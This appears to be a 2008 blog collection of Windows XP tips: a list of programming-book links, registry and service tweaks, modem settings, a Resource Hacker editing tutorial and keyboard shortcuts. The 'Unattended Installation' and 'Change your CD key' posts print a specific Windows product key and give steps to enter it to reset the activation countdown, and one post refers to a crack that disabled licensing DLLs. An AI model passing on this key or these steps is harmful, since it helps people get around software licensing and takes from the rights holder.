http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

182
Special edition using java, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

183
Special edition using _javascript
http://www.parsian.net/set1252/pages/books.htm

184
Special edition using _javascript
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

185
Special edition using _Jscript
http://www.parsian.net/set1252/pages/books.htm

186
Special edition using lotus notes and domino 4.5
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

187
Special edition using Microsoft SQL server 6.5, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

188
Special edition using Microsoft visual Interdev
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

189
Special edition using perl 5 for web programming
http://www.parsian.net/set1252/pages/books.htm

190
Special edition using perl for web programming
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

191
Special edition using Visual Basic 4
http://www.parsian.net/set1252/pages/books.htm

192
TCP/IP
http://www.hk8.org/old_web/

193
Teach yourself activex programming in 21 days
http://www.parsian.net/set1252/pages/books.htm

194
Teach yourself C++ in 21 days
http://www.parsian.net/set1252/pages/books.htm

195
Teach yourself C++ in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

196
Teach yourself CGI programming with Perl 5 in a week
http://www.parsian.net/set1252/pages/books.htm

197
Teach yourself database programming with VB5 in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

198
Teach yourself database programming with visual basic 5 in 21 days
http://www.parsian.net/set1252/pages/books.htm

199
Teach yourself HTML 3.2 in 24 hours
http://www.parsian.net/set1252/pages/books.htm

200
Teach yourself HTML 3.2 in 24 hours
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

201
Teach yourself internet game programming with java in 21 days
http://www.parsian.net/set1252/pages/books.htm

202
Teach yourself java 1.1 programming in 24 hours
http://www.parsian.net/set1252/pages/books.htm

203
Teach yourself jave in café in 21 days
http://www.parsian.net/set1252/pages/books.tm

204
Teach yourself Microsoft visual Interdev in 21 days
http://www.parsian.net/set1252/pages/books.htm

205
Teach yourself Microsoft visual Interdev in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

206
Teach yourself oracle 8 in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

207
Teach yourself perl 5 in 21 days
http://www.parsian.net/set1252/pages/books.htm

208
Teach yourself perl 5 in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

209
Teach yourself SQL in 21 days
http://www.parsian.net/set1252/pages/books.htm

210
Teach yourself SQL in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

211
Teach yourself TCP/IP in 14 days
http://www.parsian.net/set1252/pages/books.htm

212
Teach yourself TCP/IP in 14 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

213
Teach yourself the Internet in 24 hours
http://www.parsian.net/set1252/pages/books.htm

214
Teach yourself the internet in 24 hours
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

215
Teach yourself _VBScript in 21 days
http://www.parsian.net/set1252/pages/books.htm

216
Teach yourself _VBScript in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

217
Teach yourself visual basic 5 in 24 hours
http://www.parsian.net/set1252/pages/books.htm

218
Teach yourself Visual Basic 5 in 24 hours
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

219
Teach yourself Visual J++ in 21 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

220
Teach yourself web publishing with HTML 3.2 in 14 days
http://www.parsian.net/set1252/pages/books.htm

221
Teach yourself web publishing with HTML in 14 days
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

222
Thinking in C++
http://www.mindview.net/Books

223
Thinking in C++/Eckel, Bruce - Vol.I, 2nd.ed.
www.oopweb.com

224
Thinking in C++/Eckel, Bruce - Vol.II, 2nd.ed.
www.oopweb.com

225
Thinking in Enterprise Java
http://www.mindview.net/Books

226
Thinking in Java, 2nd.ed.
www.oopweb.com

227
Thinking in Java, 3rd.ed. (pdf)
http://www.mindview.net/Books

228
Tricks of the internet gurus
http://www.parsian.net/set1252/pages/books.htm

229
Tricks of the java programming gurus
http://www.parsian.net/set1252/pages/books.htm

230
Unix and internet security
http://www.hk8.org/old_web/

231
Unix hints and hacks/Waingrow, Kirk
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Hints_&_Hacks/19270001..htm

232
Unix in a nutshell
http://www.hk8.org/old_web/

233
Unix kornshell quick reference
http://book.onairweb.net/computer/os/shell/Unix_KornShell_Quick_Reference/kornShell.html

234
Unix power tools
http://www.hk8.org/old_web/

235
Unix shell guide
http://book.onairweb.net/computer/os/shell/The_UNIX_Shell_Guide/

236
Unix unleashed
http://www.parsian.net/set1252/pages/books.htm

237
Unix unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

238
Unix unleashed Internet Ed./Burk, Robin
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed(Internet_Edition)/fm.htm

239
Unix unleashed, System administrator's Edition
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed_System_Administrator's_Edition/toc.htm

240
Unix Unleashed/Sams Publication
http://book.onairweb.net/computer/os/unix/Administration/UNIX_Unleashed/

241
Upgrading PCs illustrated
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

242
Using windows NT workstation 4.0
http://www.parsian.net/set1252/pages/books.htm

243
_VBScript unleashed
http://www.parsian.net/set1252/pages/books.htm

244
_Vbscript unleashed
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

245
Visual basic 4 in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

246
Visual basic 4 unleashed
http://www.parsian.net/set1252/pages/books.htm

247
Visual Basic 5 night school
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

248
Visual basic programming in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

249
Visual Basic programming in 12 easy lessons
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

250
Visual C++ 4 unleashed
http://www.parsian.net/set1252/pages/books.htm

251
Visual C++ programming in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

252
Web database developer's guide with visual basic 5
http://www.parsian.net/set1252/pages/books.htm

253
Web database developer's guide with visual basic 5
http://www.emu.edu.tr/english/facilitiesservices/computercenter/bookslib/

254
Web programming desktop reference 6-in-1
http://www.parsian.net/set1252/pages/books.htm

writing another page on this post n also how to get your desired software !

MORE TO COME !

Make xp run faster

2008-08-07T11:11:00.000-07:00

Make xp run faster
Services You Can Disable

There are quite a few services you can disable from starting automatically.
This would be to speed up your boot time and free resources.
They are only suggestions so I suggestion you read the description of each one when you run Services
and that you turn them off one at a time.

Some possibilities are:
Alerter
Application Management
Clipbook
Fast UserSwitching
Human Interface Devices
Indexing Service
Messenger
Net Logon
NetMeeting
QOS RSVP
Remote Desktop Help Session Manager
Remote Registry
Routing & Remote Access
SSDP Discovery Service
Universal Plug and Play Device Host
Web Client

--------------------------------------------------------------------------------

Cleaning the Prefetch Directory

WindowsXP has a new feature called Prefetch. This keeps a shortcut to recently used programs.
However it can fill up with old and obsolete programs.

To clean this periodically go to:

Star / Run / Prefetch
Press Ctrl-A to highlight all the shorcuts
Delete them

--------------------------------------------------------------------------------

Not Displaying Logon, Logoff, Startup and Shutdown Status Messages

To turn these off:

Start Regedit
Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
If it is not already there, create a DWORD value named DisableStatusMessages
Give it a value of 1

--------------------------------------------------------------------------------
Clearing the Page File on Shutdown

Click on the Start button
Go to the Control Panel
Administrative Tools
Local Security Policy
Local Policies
Click on Security Options
Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
Select "Enable"
Reboot

For regedit users.....
If you want to clear the page file on each shutdown:

Start Regedit
Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown
Set the value to 1

--------------------------------------------------------------------------------

No GUI Boot

If you don't need to see the XP boot logo,

Run MSCONFIG
Click on the BOOT.INI tab
Check the box for /NOGUIBOOT

---------------------------------------------------------------------------------
Speeding the Startup of Some CD Burner Programs

If you use program other than the native WindowsXP CD Burner software,
you might be able to increase the speed that it loads.

Go to Control Panel / Administrative Tools / Services
Double-click on IMAPI CD-Burning COM Service
For the Startup Type, select Disabled
Click on the OK button and then close the Services window
If you dont You should notice

--------------------------------------------------------------------------------

Getting Rid of Unread Email Messages

To remove the Unread Email message by user's login names:

Start Regedit
For a single user: Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail
For all users: Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\UnreadMail
Create a DWORD key called MessageExpiryDays
Give it a value of 0

------------------------------------------------------------------------------

Decreasing Boot Time

Microsoft has made available a program to analyze and decrease the time it takes to boot to WindowsXP
The program is called BootVis

Uncompress the file.
Run BOOTVIS.EXE
For a starting point, run Trace / Next Boot + Driver Delays
This will reboot your computer and provide a benchmark
After the reboot, BootVis will take a minute or two to show graphs of your system startup.
Note how much time it takes for your system to load (click on the red vertical line)
Then run Trace / Optimize System
Re-Run the Next Boot + Drive Delays
Note how much the time has decreased
Mine went from approximately 33 to 25 seconds.

--------------------------------------------------------------------------------
Increasing Graphics Performance

By default, WindowsXP turns on a lot of shadows, fades, slides etc to menu items.
Most simply slow down their display.

To turn these off selectively:

Right click on the My Computer icon
Select Properties
Click on the Advanced tab
Under Performance, click on the Settings button
To turn them all of, select Adjust for best performance
My preference is to leave them all off except for Show shadows under mouse pointer and Show window contents while dragging

---------------------------------------------------------------------------

Increasing System Performance

If you have 512 megs or more of memory, you can increase system performance
by having the core system kept in memory.

Start Regedit
Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\DisablePagingExecutive
Set the value to be 1
Reboot the computer

---------------------------------------------------------------------------

Increasing File System Caching

To increase the amount of memory Windows will locked for I/O operations:

Start Regedit
Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
Edit the key IoPageLockLimit

-----------------------------------------------------------------------------

Resolving Inability to Add or Remove Programs

If a particular user cannot add or remove programs, there might be a simple registry edit neeed.

Go to HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall
Change the DWORD NoAddRemovePrograms to 0 disable it

4096 - 32megs of memory or less
8192 - 32+ megs of memory
16384 - 64+ megs of memory
32768 - 128+ megs of memory
65536 - 256+ megs of memorY

Maximize Dial-up Modem Settings :

2008-08-07T11:01:00.000-07:00

Maximize Dial-up Modem Settings :

Did you know that by changing a few settings you can make your dial-up modem run better? That's right—you might have a fast modem and a good connection, but you're not getting the best performance. With a few adjustments, you can get faster connection speeds.

NOTE: Since every PC configuration is different, these adjustments might not work for everyone.

With Windows 95, 98 & ME you'll need to open your Control Panel ( Start / Control Panel ). Click "System" then choose "Device Manager". Open up "Ports", highlight your modem port (should be COM2), and choose "Properties" near the bottom. When you click "Port Settings", you will see the modem speed listed under "Bits per second".

With Win XP , just hold down the Alt key and double-click "My Computer" to bring up System Properties. Click the "Hardware" tab, then choose the "Device Manager" button. Scroll down to "Modems" and click the little (—) to show your modem, then double click it.

Selecting the "Modem" tab will allow you to adjust the port speed.

Usually, the Maximum Port Speed is on the highest setting (115,000 bps), but sometimes you will find it on a slower default of 9600 bps. If you have a 56k modem, you can crank it up to the maximum setting without any trouble (in most cases). If you live in a cave and have a 28k modem, then the fastest you can do is 57,600 bps.

Win 9x users should also adjust the "Flow Control" near the bottom. The default for this is usually Xon/Xoff which is the software control—change this to "Hardware" if you want to get the most from your modem. Next, click the "Advanced" button to adjust the Receiver Buffer to its highest setting (all the way to the right). If you run into any problems, just turn this one back to the 2/3 setting.

To check/adjust the Receive-Transmit buffers in XP, click the "Advanced" tab of your modem properties then choose the "Advanced Port Settings" button. Make sure that both are set to their highest settings.

There are many more tweaks that can be done in the registry, but the potential for disaster is too high for the average user. Some folks install dial-up accelerators, which basically tweak these registry settings for you and perform other routines to optimize performance.

Just by changing these few settings, though, you should see better performance.

Modify .exe files and crack a program :

2008-08-07T11:00:00.000-07:00

Modify .exe files and crack a program :

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Couse that's for programmers and assembly experts only. If any of you dumb kids
try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version).It's a resource editor-
very easy to use.

Resource Hacker Version 3.4.0
CODE
http://delphi.icm.edu.pl/ftp/tools/ResHack.zip/

Help File
CODE
http://www.users.on.net/johnson/resourceha...eshack_hlp.zip/

################################################################################
#
2)Unzip the archive, and run ResHacker.exe. You can check out the help file too,
if you want to be a guru.
################################################################################
#
3)You will see that the interface is simple and clean. Go to the menu File\Open or
press Ctrl+O to open a file. Browse your way to the file you would like to edit.
You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is ment
to teach you how to edit *.exe files, so open one.
################################################################################
#
4)In the left side of the screen a list of sections will appear.
The most common sections are: -Icon;
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget
to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.
################################################################################
####

5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can
modify or translate the text change links, change buttons, etc.
################################################################################
#####

TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save
your work @ File\Save(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved
file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it becouse of it's structure.

Remember! This is only a small example of what you can do to executables with Resource Hacker.

Remove Windows Messenger n all !

2008-08-07T10:57:00.000-07:00

Remove Windows Messenger
========================

It seems that a lot of people are interested in removing Windows Messenger for some reason, though I strongly recommend against this: In Windows XP, Windows Messenger will be the hub of your connection to the .NET world, and now that this feature is part of Windows, I think we're going to see a lot of .NET Passport-enabled Web sites appearing as well. But if you can't stand the little app, there are a couple of ways to get rid of it, and ensure that it doesn't pop up every time you boot into XP. The best way simply utilizes the previous tip:

If you'd like Windows Messenger to show up in the list of programs you can add and remove from Windows, navigate to C:\WINDOWS\inf (substituting the correct drive letter for your version of Windows) and open sysoc.inf (see the previous tip for more information about this file). You'll see a line that reads:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

Change this to the following and Windows Messenger will appear in Add or Remove Programs, then Add/Remove Windows Components, then , and you can remove it for good:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7

Autolog On tip for XP
real easy and straight forward.
1. click on "Start" - then click on "Run" - type "control userpasswords2"
2. click OK
3. On the Users tab, clear the "Users must enter a user name and password to
use this computer" check box.
4. A dialog will appear that asks you what user name and password should be used to logon automatically.

Your all set.

Aspi
WinXP does not come with an Aspi layer. So far almost 90% of the problems with winXP and CD burning software are Aspi layer problems. After installing winXP, before installing any CD burning software do a few things first:

1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer.

2. Next install the standard Aspi layer for NT. Reboot when asked.

Thats is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

Print Dir
XP alas does not include a way to print a directory listing aside from using the command prompt. I talking about a right click on the directory and print the files names on the printer type of Dir print. So I guess we will need to add one - start up regedit and add the following

[HKEY_CLASSES_ROOT\Folder\shell\print\command]
@="command.com /c dir %1 > PRN"

[HKEY_CLASSES_ROOT\Folder\shell\print\command]
@="command.com /c dir %1 > dirprnt.txt"

Right click on a folder in windows explorer and choose "print". The contents of the folder will appear in a file called dirprnt.txt in the folder. open the file and print it out. If you want to print directly to the printer remove the second line containing "dirprnt.txt"

Rename Multiple files
A new, small, neat feature for winXP deals with renaming files. I personally have always wanted the OS to include a way to do a mass file renaming on a bunch of files. You can now rename multiple files at once in WinXP. Its real simple:

1. Select several files in Explorer, press F2 and rename one of those files to
something else. All the selected files get renamed to the new file name (plus a number added to the end).

2. thats it. Simple huh.

I would recommend that you only have the files you want to rename in the directory your working in. I would also recommend that until you get used to this neat little trick that you save copies of the files in a safe location while your getting the hang of it.

Handy for renaming those mass amounts of porn pics you d/l from the web
Use Window Blinds XP to add themes
Windows Blinds XP has been integrated into the Windows XP operating system. Microsoft and Stardock have entered into a partnership in which Microsoft will use their technology in the Windows XP operating system. With Windows Blinds XP installed you have additional styles to choose from in display properties.
And the best part is you can download over 1000 different styles and even make your own very easily with the SDK.
To get started you need to download the Windows Blinds XP extension: www.stardock.com/files/wbxp-b5_private.exe to download the latest beta
Note: You must register at http://scripting.stardock.com/customer/wbxp_beta.asp to be able to legally download the Windows Blinds XP beta. Once you register they will even e-mail you when new builds are available for download.
Once downloaded, install the program and you will notice the extra styles in the display properties when you run the program.
To download more styles www.wincustomize.com/index.asp and select windows blinds on the menu on the left.

Show file extensions
Ever wonder where you file extensions went? Working with files when you can not tell what the file extension can be a huge pain in the butt. Thankfully, MS has made it possible for all file names with the extensions to be shown.
In any folder that contains files. Click on the tools menu and select folder options.
Then click on the view tab.
Locate where it lists Hide extensions of known file types and uncheck it.
Click OK.

XP memory tweaks
Below are some Windows XP memory tweaks. They are located in the windows registry at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
DisablePagingExecutive - When enabled, this setting will prevent the paging of the Win2k Executive files to the hard drive, causing the OS and most programs to be more responsive. However, it is advised that people should only perform this tweak if they have a significant amount of RAM on their system (more than 128 MB), because this setting does use a substantial portion of your system resources. By default, the value of this key is 0. To enable it, set it to 1.
LargeSystemCache - When enabled (the default on Server versions of Windows 2000), this setting tells the OS to devote all but 4 MB of system memory (which is left for disk caching) to the file system cache. The main effect of this is allowing the computer to cache the OS Kernel to memory, making the OS more responsive. The setting is dynamic and if more than 4 MB is needed from the disk cache for some reason, the space will be released to it. By default, 8MB is earmarked for this purpose. This tweak usually makes the OS more responsive. It is a dynamic setting, and the kernel will give up any space deemed necessary for another application (at a performance hit when such changes are needed). As with the previous key, set the value from 0 to 1 to enable. Note that in doing this, you are consuming more of your system RAM than normal. While LargeSystemCache will cut back usage when other apps need more RAM, this process can impede performance in certain intensive situations. According to Microsoft, the "[0] setting is recommended for servers running applications that do their own memory caching, such as Microsoft SQL Server, and for applications that perform best with ample memory, such as Internet Information Services."
IOPageLockLimit - This tweak is of questionable value to people that aren't running some kind of server off of their computer, but we will include it anyway. This tweak boosts the Input/Output performance of your computer when it is doing a large amount of file transfers and other similar operations. This tweak won't do much of anything for a system without a significant amount of RAM (if you don't have more than 128 MB, don't even bother), but systems with more than 128 MB of RAM will generally find a performance boost by setting this to between 8 and 16 MB. The default is 0.5 MB, or 512 KB. This setting requires a value in bytes, so multiply the desired number of megabytes * 1024 * 1024. That's X * 1048576 (where X is the number, in megabytes). Test out several settings and keep the one which seems to work best for your system.

======================================================================================

http://www.tweakxp.com/default.asp
http://www.wxperience.com/
http://www.xs4all.nl/~binkbv/windowsxp/
http://users.aol.com/axcel216/
http://scripts.wincustomize.com/skins.asp
http://thor.prohosting.com/~1cls/

Add/Remove optional features of Windows XP

2008-08-07T10:56:00.000-07:00

Add/Remove optional features of Windows XP
==========================================

To dramatically expand the list of applications you can remove from Windows XP after installation, navigate to C:\WINDOWS\inf (substituting the correct drive letter for your version of Windows) and open the sysoc.inf file. Under Windows XP Professional Edition RC1, this file will resemble the following by default:

[Version] Signature = "$Windows NT$"
DriverVer=06/26/2001,5.1.2505.0

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
msnexplr=ocmsn.dll,OcEntry,msnmsn.inf,,7
smarttgs=ocgen.dll,OcEntry,msnsl.inf,,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
Games=ocgen.dll,OcEntry,games.inf,,7
AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7
CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7
MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7
AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7
Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7
MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7
ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7

[Global]
WindowTitle=%WindowTitle%
WindowTitle.StandAlone="*"

The entries that include the text hide or HIDE will not show up in Add/Remove Windows Components by default. To fix this, do a global search and replace for ,hide and change each instance of this to , (a comma). Then, save the file, relaunch Add/Remove Windows Components, and tweak the installed applications to your heart's content.

There are even more new options now under "Accessories and Utilities" too.

Enable ClearType on the Welcome Screen!

2008-08-07T10:55:00.000-07:00

Enable ClearType on the Welcome Screen!
=======================================

As laptop users and other LCD owners are quickly realizing, Microsoft's ClearType technology in Windows XP really makes a big difference for readability. But the this feature is enabled on a per-user basis in Windows XP, so you can't see the effect on the Welcome screen; it only appears after you logon.

But you can fix that. Fire up the Registry Editor and look for the following keys:

(default user) HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothing (String Value)
HKEY_USERS \ .Default \ Control Panel \ Desktop \ FontSmoothingType (Hexadecimal DWORD Value)

Make sure both of these values are set to 2 and you'll have ClearType enabled on the Welcome screen and on each new user by default.

Unattended Installation of Windows Xp :

2008-08-07T10:53:00.002-07:00

Do an Unattended Installation of Windows Xp :
=============================================

The Windows XP Setup routine is much nicer than that in Windows 2000 or Windows Me, but it's still an hour-long process that forces you to sit in front of your computer for an hour, answering dialog boxes and typing in product keys. But Windows XP picks up one of the more useful features from Windows 2000, the ability to do an unattended installation, so you can simply prepare a script that will answer all those dialogs for you and let you spend some quality time with your family.
I've written about Windows 2000 unattended installations and the process is pretty much identical on Windows XP, so please read that article carefully before proceeding. And you need to be aware that this feature is designed for a standalone Windows XP system: If you want to dual-boot Windows XP with another OS, you're going to have to go through the interactive Setup just like everyone else: An unattended install will wipe out your hard drive and install only Windows XP, usually.

To perform an unattended installation, you just need to work with the Setup Manager, which is located on the Windows XP CD-ROM in D:\SupportTools\DEPLOY.CAB by default: Extract the contents of this file and you'll find a number of useful tools and help files; the one we're interested in is named setupmgr.exe. This is a very simple wizard application that will walk you through the process of creating an answer file called winnt.sif that can be used to guide Windows XP Setup through the unattended installation.

One final tip: There's one thing that Setup Manager doesn't add: Your product key. However, you can add this to the unattend.txt file manually. Simply open the file in Notepad and add the following line under the [UserData] section:

ProductID=RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ

(This is a 60 day CD key)

Then, just copy winnt.sif to a floppy, put your Windows XP CD-ROM in the CD drive, and reboot: When the CD auto-boots, it will look for the unattend.txt file in A: automatically, and use it to answer the Setup questions if it's there.

Finally, please remember that this will wipe out your system! Back up first, and spend some time with the help files in DEPLOY.CAB before proceeding.

For Older builds or not using setupreg.hiv file

Speed up the Start Menu

2008-08-07T10:53:00.001-07:00

Speed up the Start Menu
=======================

The default speed of the Start Menu is pretty slow, but you can fix that by editing a Registry Key. Fire up the Registry Editor and navigate to the following key:
HKEY_CURRENT_USER \ Control Panel \ Desktop \ MenuShowDelay

By default, the value is 400. Change this to a smaller value, such as 0, to speed it up.

Speed up the Start Menu (Part two)
==================================

If your confounded by the slow speed of the Start Menu, even after using the tip above, then you might try the following: Navigate to Display Properties then Appearance then Advanced and turn off the option titled Show menu shadow . You will get much better overall performance.

Remove the Shared Documents folders from My Computer

2008-08-07T10:52:00.001-07:00

Remove the Shared Documents folders from My Computer
====================================================

One of the most annoying things about the new Windows XP user interface is that Microsoft saw fit to provide links to all of the Shared Documents folders on your system, right at the top of the My Computer window. I can't imagine why this would be the default, even in a shared PC environment at home, but what's even more annoying is that you cannot change this behavior through the sh*ll
: Those icons are stuck there and you have to live with it.
Until now, that is.

Simply fire up the Registry Editor and navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders

You'll see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this, all of the Shared Documents folders (which are normally under the group called "Other Files Stored on This Computer" will be gone.

You do not need to reboot your system to see the change.

Before: A cluttered mess with icons no one will ever use (especially that orphaned one). After: Simplicity itself, and the way it should be by default.

Change your CD key

2008-08-07T10:51:00.000-07:00

Change your CD key
==================

You don't need to re-install ... just do this

1. Go to Activate Windows
2. Select the Telephone option
3. Click "Change Product Key"
4. Enter RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
5. Click "Update"

Now log off and log back in again. It should now show 60 days left, minus the number of days it had already counted down.

Note: If your crack de-activated REGWIZC.DLL and LICDLL.DLL, you are going to have to re-register them.

Your Windows Key

2008-08-07T10:49:00.000-07:00

Your Windows Key :
====================

The Windows key, located in the bottom row of most computer keyboards is a little-used treasure.

Windows: Display the Start menu
Windows + D: Minimize or restore all windows
Windows + E: Display Windows Explorer
Windows + F: Display Search for files
Windows + Ctrl + F: Display Search for computer
Windows + F1: Display Help and Support Center
Windows + R: Display Run dialog box
Windows + break: Display System Properties dialog box
Windows + shift + M: Undo minimize all windows
Windows + L: Lock the workstation
Windows + U: Open Utility Manager
Windows + Q: Quick switching of users (Powertoys only)
Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your PC

more to come !

Software not installing?

2008-08-07T10:47:00.000-07:00

Software not installing?
========================

If you have a piece of software that refuses to install because it says that you are not running Windows 2000 (such as the Win2K drivers for a Mustek scanner!!) you can simply edit HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/ProductName to say Microsoft Windows 2000 instead of XP and it will install. You may also have to edit the version number or build number, depending on how hard the program tries to verify that you are installing on the correct OS. I had to do this for my Mustek 600 CP scanner (compatibility mode didn't' help!!!) and it worked great, so I now have my scanner working with XP (and a tech at Mustek can now eat his words).

Between, don't' forget to restore any changes you make after you get your software installed

You do this at your own risk !

Add a Map Drive Button to the Toolbar

2008-08-07T10:46:00.002-07:00

Add a Map Drive Button to the Toolbar
=====================================

Do you want to quickly map a drive, but can?t find the toolbar button? If you map drives often, use one of these options to add a Map Drive button to the folder toolbar.

Option One (Long Term Fix)

Click Start, click My Computer, right-click the toolbar, then unlock the toolbars, if necessary.

Right-click the toolbar again, and then click Customize.

Under Available toolbar buttons, locate Map Drive, and drag it into the position you want on the right under Current toolbar buttons.

Click Close, click OK, and then click OK again.

You now have drive mapping buttons on your toolbar, so you can map drives from any folder window. To unmap drives, follow the above procedure, selecting Disconnect under Available toolbar buttons. To quickly map a drive, try this option.

Option Two (Quick Fix)

Click Start, and right-click My Computer.
Click Map Network Drive.

If you place your My Computer icon directly on the desktop, you can make this move in only two clicks!

Create a Shortcut to Start Remote Desktop

2008-08-07T10:46:00.001-07:00

Create a Shortcut to Start Remote Desktop
=========================================

Tip: You can add a shortcut to the desktop of your home computer to quickly start Remote Desktop and connect to your office computer.

To create a shortcut icon to start Remote Desktop

Click Start, point to More Programs, point to Accessories, point to Communications, and then click on Remote Desktop Connection.

Click Options.

Configure settings for the connection to your office computer.

Click Save As, and enter a name, such as Office Computer. Click Save.

Open the Remote Desktops folder.

Right-click on the file named Office Computer, and then click Create Shortcut.

Drag the shortcut onto the desktop of your home computer.

To start Remote Desktop and connect to your office computer, double-click on the shortcut

Create a Shortcut to Lock Your Computer

2008-08-07T10:45:00.001-07:00

Create a Shortcut to Lock Your Computer
=======================================

Leaving your computer in a hurry but you don?t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver.

To create a shortcut on your desktop to lock your computer:

Right-click the desktop.
Point to New, and then click Shortcut.

The Create Shortcut Wizard opens. In the text box, type the following:
rundll32.exe user32.dll,LockWorkStation

Click Next.

Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like.

Click Finish.

You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll).

To change the icon:

Right click the shortcut and then select Properties.
